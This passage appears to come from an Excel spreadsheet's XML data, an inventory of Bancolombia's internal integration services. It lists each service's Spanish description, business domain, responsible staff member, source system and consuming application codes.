    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite consultar la información personal básica del cliente (ejemplo: llave MDM, Tipo identificación, identificación, nombre, apellido del cliente, entre otros) y la información detallada del cliente (ejemplo: ciudad de nacimiento, Fecha nacimiento, Primer nombre, Primer apellido, entre otros). El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="NU0102001 _x000d__x000a_NU0034001 _x000d__x000a_AW0360004 _x000d__x000a_AW0748001 _x000d__x000a_AW0899001 _x000d__x000a_AW1258002 _x000d__x000a_AW1281002 _x000d__x000a_NU0143001 _x000d__x000a_AW1074001 _x000d__x000a_SVP _x000d__x000a_NU0038001 _x000d__x000a_AW1272001 _x000d__x000a_AW0611001 _x000d__x000a_GDE _x000d__x000a_NU0104001 _x000d__x000a_NU0014001 _x000d__x000a_AW1302001 _x000d__x000a_AW1310 _x000d__x000a_NU0064001 _x000d__x000a_AW1281003 _x000d__x000a_NU0139001 _x000d__x000a_APP _x000d__x000a_AW1108001 _x000d__x000a_AW0955 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_CIF _x000d__x000a_AW1313001 _x000d__x000a_AUD _x000d__x000a_NU0035001 _x000d__x000a_AW1151001 _x000d__x000a_NU0046001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001 _x000d__x000a_NU0142001 _x000d__x000a_AW0638 _x000d__x000a_AW1365 _x000d__x000a_NU0004001 _x000d__x000a_AW1326001 _x000d__x000a_AW1285001 _x000d__x000a_NU0135001 _x000d__x000a_NU0170001 _x000d__x000a_AW1435001 _x000d__x000a_AW1176 _x000d__x000a_AW0661003 _x000d__x000a_AW1480001 _x000d__x000a_AW1184003 _x000d__x000a_NU0219001 _x000d__x000a_NU0091001 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Relaciones Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite consultar la información de las relaciones o vínculos del cliente, por ejemplo: Referencia comercial, referencia personal, referencia familiar, abogado, ejecutivo de portafolio, entre otros. El servicio puede ser consultado con el tipo y número de documento original del cliente, o las llaves de los sistemas: CRM, MDM o CIF.  Los clientes consultados corresponden a persona natural y persona jurídica"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0360004 _x000d__x000a_AW1074001 _x000d__x000a_NU0142001 _x000d__x000a_NU0135001 _x000d__x000a_AW1285001 _x000d__x000a_AW1176001 _x000d__x000a_NU0091001 _x000d__x000a_NU0046001 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Tarjeta Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que permite realizar las diferentes consultas de datos asociados a las tarjetas de crédito, donde se retorna información de campos de saldos, consumos, intereses y abonos de la tarjeta de crédito que se pueden exponer a nivel de los clientes."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="AW1165"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Tributarios Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite consultar la información tributaria del cliente, estos datos corresponden a la información de impuestos, retención, entre otros. El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0748001 _x000d__x000a_AW1074001 _x000d__x000a_NU0139001 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta De Archivos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Nos permite realizar la consulta de los archivos tanto Enviados como Recibidos (ejemplo: Novedades, Cobro, Facturación y Anulación, etc.), inicialmente de los pagos realizados por un cliente a través de los diferentes canales de un convenio. _x005f_x000D_ _x005f_x000D_ Y además para proporcionar al cliente una asesoría completa de sus movimientos._x005f_x000D_ "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta De Pagos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Consultar Pagos permite al consumidor obtener información de los pagos en el Sistema de Pagos Automáticos PAB, ingresando la información correspondiente a la identificación del cliente pagador y opcionalmente podrá ingresar información asociada a la clase de pago, tipo de pago, beneficiario y cuenta del beneficiario con el fin de acotar la búsqueda. Esta consulta se puede realizar hasta tres meses atrás."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta De Saldos Cuentas Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El Servicio Consulta De Saldos Cuentas Depósitos permite a los consumidores obtener el detalle de los saldos que tiene una cuenta en particular o listar los saldos de todas las cuentas de un cliente. Se puede consultar por ejemplo el saldo disponible, saldo con cupo de sobregiro, saldo en canje, saldo en cuentas por cobrar, saldo bloqueado entre otros."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1170 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0001001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta De Tarifas Tarjetas Debito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta de Tarifas permite exponer los diferentes valores asociados a una tarjeta débito_x000a_- Consultar Cuota de Manejo: Expone los datos relacionados con la cuota de manejo de la tarjeta débito dependiendo del_x000a_plan de la cuenta, clase de la tarjeta y grupo de cobro."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0091001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Desembolso Credito Pyme"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Desembolso Crédito Pyme, permite obtener la información del estado al momento de la consulta de los distintos procesos de desembolso de crédito pyme."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Desembolso Credito Pyme"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio Consulta Desembolso Crédito Pyme, permite obtener la información del estado al momento de la consulta de los distintos procesos de desembolso de crédito pyme. "/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW1170 _x000d__x000a_AW1287 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Documentos Cuenta Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaDocumentosCuentaDepositos permitirá a los consumidores consultar la información necesaria para construir documentos como certificados, recomendaciones, movimientos de cuentas de sus productos como cuenta corriente o ahorros."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="DEP - Servicios Depositos_ISDEP0001"/>
    <s v="AW1272001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Documentos Tarjeta Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaDocumentosTarjetaCredito permitirá a los consumidores consultar la información necesaria para construir documentos como certificados, recomendaciones, movimientos de cuentas y paz y salvos de sus tarjetas de crédito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="AW1272001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Extendida De Saldos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaExtendidaDeSaldos tiene como objetivo realizar la consulta de saldos de las cuentas depósitos (Ahorros /Corriente) de un cliente Bancolombia de la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco.&amp;"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depósitos (Cuentas Corriente y de Ahorro) Personalizacion_ISBVD0001"/>
    <s v="NU0017001 _x000d__x000a_AW1272001 _x000d__x000a_AW1302001 _x000d__x000a_SVE _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Extractos Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite la consultar los extractos y los periodos disponibles para consulta, de los productos de un cliente. El extracto se genera en formato Base64, para que el consumidor pueda posteriormente decodificarlo a un formato como PDF."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <s v="Paradoc - Extracto Unificado FE_EUC,COLD,EBP, MAM_AW0826001"/>
    <s v="NU0021001 _x000d__x000a_AW1272001 _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Facturas Inscritas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio consulta de facturas inscritas permitirá conocer las facturas que tienen registradas un pagador con sus caracteristicas, como son: Disponibilidad para pago, si está ligada a un debito automatico, canal, fecha de registro, entre otros."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Fondos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Fondos, agrupa todas las consultas (Específicas y detalladas) que se le pueden hacer a los Fondos de inversión de los productos de valores y fiduciaria del Grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AW0637001 _x000d__x000a_AW0360004 _x000d__x000a_SVE _x000d__x000a_AW1185001 _x000d__x000a_AW1177001 _x000d__x000a_NU0170001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Fondos"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Este servicio permitirá a los consumidores realizar la consulta específica y detallada de los fondos de inversión colectiva (FIC) del Grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AW1185001 _x000d__x000a_NU0021001 _x000d__x000a_NU0149001 _x000d__x000a_AW1177001 _x000d__x000a_SVE _x000d__x000a_NU0160001 _x000d__x000a_NU0170001 _x000d__x000a_NU0153001 _x000d__x000a_NU0146001 _x000d__x000a_AW0955001 _x000d__x000a_NU0051001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Fuentes Privadas Externas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que permite conocer si un documento es válido y adicionalmente traer información de ese documento. Bien sea de personas naturales o jurídicas."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Gestion Comercial Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio posibilita a nuevos consumidores o nuevos componentes la reutilización expuesta por el servicio ConsultaGestionComercialCliente, el cual sirve para consultar información de Gestión comercial de los clientes. El servicio obtiene su información de componentes de integración del tipo función de mediación, los cuales implementa las operaciones correspondientes para acceder a cada funcionalidad provista por los datos maestros de MDM de información implementadas a través de procedimientos almacenados. Este servicio consulta la información de datos maestros de los clientes de Colombia.  El servicio actual cuenta con 2 operaciones las cuales permiten consultar la información a la base de datos MDM enviando la llave de identificación del cliente (CIF;CRM;MDM;NumeroIDentificacion;documentoExterno), retornando la información específica del cliente,  convirtiéndose en un componente de consulta general  de Master Data Management (MDM),  que pueda ser utilizado para diferentes necesidades de información de los frentes  y no quedar ligado o ser una consulta exclusiva que retorne la información a la medida de una sola necesidad"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="NU0102001 _x000d__x000a_AW0360004 _x000d__x000a_AW1285001 _x000d__x000a_AW0748001 _x000d__x000a_AW0899001 _x000d__x000a_AW1074001 _x000d__x000a_SVP _x000d__x000a_NU0038001 _x000d__x000a_AW1272001 _x000d__x000a_AW1302001 _x000d__x000a_MAT _x000d__x000a_NU0114001 _x000d__x000a_AW1313001 _x000d__x000a_NU0046001 _x000d__x000a_AW1326001 _x000d__x000a_AW1250 _x000d__x000a_NU0135001 _x000d__x000a_NU0021001 _x000d__x000a_AW1249001 _x000d__x000a_NU0034001 _x000d__x000a_AW1281003 _x000d__x000a_NU0032001 _x000d__x000a_AW1176 _x000d__x000a_AW0661003 _x000d__x000a_AW1151001 _x000d__x000a_AW1176001 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Gestion Tarjetas Debito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Gestión tarjetas Débito permite consultar la gestión que se han realizado en una tarjeta débito:"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta GMF"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El Servicio ConsultaCaracteristicasPlanCuenta  habilita las capacidades que permite consultar el detalle de la marcación de la cuenta sobre el impuesto GMF (Gravamen a movimientos financieros). "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0091001 _x000d__x000a_NU0170001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Grupos De Riesgo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio tiene como alcance consultar los integrantes de los grupos de Riesgo Legales y administrativos o internos de un cliente empresarial."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW1176 _x000d__x000a_AW0922 _x000d__x000a_AW1294001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Bolsillos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Bolsillos Bancolombia permite separar los recursos de una cuenta de ahorros para mantener diferentes ahorros en bolsillos separados con una meta en específico, por ejemplo, ahorros para viajes, salud, alimentación, transporte etc.  El servicio ConsultaInformacionBolsillos habilita las capacidades de consulta de bolsillos como, por ejemplo, consultar los bolsillos de una cuenta de ahorros en específico, consultar el detalle de un bolsillo, listar las diferentes categorías por las cuales se puede separar el dinero entre otras."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="NU0021001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cliente Empresarial"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Información Cliente Empresarial permite la consulta de información general, información financiera y la información de contactos, accionistas y miembros de junta de una empresa particular sea persona natural o jurídica."/>
    <s v="CLIENTES"/>
    <s v="Clientes Empresas"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <s v="BIZTRACK_AW0998001"/>
    <s v="APIC _x000d__x000a_AW1176 _x000d__x000a_AW0856 _x000d__x000a_AW0360004"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cuentas Depositos"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio consulta información cuentas, traerá todas las cuentas activas/inactivas y que permiten débitos de un cliente."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="APIC"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cuentas Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio consulta información cuentas, traerá todas las cuentas activas/inactivas y que permiten débitos de un cliente."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="APIC"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cuentas Depositos"/>
    <n v="300"/>
    <x v="0"/>
    <s v="El servicio consulta información cuentas, traerá todas las cuentas activas/inactivas y que permiten débitos de un cliente."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cuentas Plazos Fijos"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio ConsultaInformacionCuentasPlazosFijos proporciona a los consumidores, capacidades para realizar las diferentes transacciones no monetarias sobre la información las cuentas de plazos fijos."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cuentas Plazos Fijos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaInformacionCuentasPlazosFijos proporciona a los consumidores, capacidades para realizar las diferentes transacciones no monetarias sobre la información las cuentas de plazos fijos."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="APIC"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Entrega Token SVE"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite que se realicen consultas sobre la gestión de entrega de los tokens físicos que han sido asignados a los clientes empresas del Grupo Bancolombia."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="MQ y Broker"/>
    <x v="8"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="                                             "/>
    <s v="STI _x000d__x000a_AW1123001 _x000d__x000a_GDE _x000d__x000a_TP _x000d__x000a_Allus"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Fiscal Y Parafiscal Del Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite la consulta de la información usada dentro de los aportes de a la planilla de seguridad social (PILA), información entregada por ACH con su producto SOI-DATA, lo que permite tener datos del Cliente como su salario básico actual, los detalles de empresa donde trabaja el cliente consultado, si se encuentra activo como empleado, el ingreso de la base de cotización de pensión, salud y caja de compensación. Información que permitiría revisar el estado actual salarial y de su empresa. "/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="ACH"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Fondos Fiduciarios"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio tiene como alcance realizar las consultas de los movimientos fiduciarios como Adiciones, cancelaciones, retiros y adiciones entre fondos de inversión colectiva, al igual que aquellos movimientos históricos, y del portafolio que se tiene con el producto InvesBot."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Prestamos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite consultar los préstamos que tiene un cliente, consultar los prestamos que tiene un convenio empresarial, consultar el detalle y los movimientos de un préstamo en particular. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1294001 _x000d__x000a_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
